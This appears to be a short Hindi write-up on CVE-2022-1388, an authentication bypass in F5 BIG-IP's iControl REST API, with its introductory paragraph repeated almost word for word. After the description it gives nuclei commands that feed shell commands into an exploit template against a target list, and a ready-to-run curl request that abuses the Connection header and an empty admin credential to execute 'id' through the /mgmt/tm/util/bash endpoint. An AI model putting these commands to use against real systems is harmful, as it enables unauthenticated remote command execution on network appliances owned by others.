
CVE-2022-1388 BIG-IP के iControl API के REST घटक में एक प्रमाणीकरण बायपास भेद्यता है जिसे CVSSv3 स्कोर 9.8 दिया गया था। iControl REST API का उपयोग BIG-IP उपकरणों के प्रबंधन और कॉन्फ़िगरेशन के लिए किया जाता है। CVE-2022-1388 का शोषण BIG-IP का उपयोग करने वाले उपकरणों के प्रबंधन पोर्ट या स्वयं IP पते तक नेटवर्क पहुंच वाले अनप्रमाणित हमलावर द्वारा किया जा सकता है। शोषण से हमलावर को मनमाने सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने और हटाने और सेवाओं को अक्षम करने की अनुमति मिलती है।
CVE-2022-1388, BIG-IP के iControl API के REST घटक में एक प्रमाणीकरण बायपास भेद्यता है, जिसे CVSSv3 स्कोर 9.8 दिया गया है। iControl REST API का उपयोग BIG-IP उपकरणों के प्रबंधन और कॉन्फ़िगरेशन के लिए किया जाता है। CVE-2022-1388 का शोषण एक अप्रमाणित हमलावर द्वारा किया जा सकता है जिसके पास प्रबंधन पोर्ट या BIG-IP का उपयोग करने वाले उपकरणों के स्वयं IP पतों तक नेटवर्क पहुंच हो। शोषण से हमलावर मनमाने सिस्टम कमांड निष्पादित कर सकता है, फ़ाइलें बना और हटा सकता है, और सेवाओं को अक्षम कर सकता है।
यह nuclei-टेम्पलेट शोषण के लिए शेल पैरामीटर स्वीकार करता है। हम किसी अन्य वर्कफ़्लो या मैन्युअल खोज से प्राप्त टोकन का परीक्षण करना चाहते थे, इसलिए हमने रन टाइम पर इन टेम्पलेट्स में एकल टोकन मान या टोकन की सूची को गतिशील रूप से फीड करने के लिए nuclei के CLI वेरिएबल सुविधा का उपयोग किया।
-V, -var value var=value प्रारूप में कस्टम वेरिएबल
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'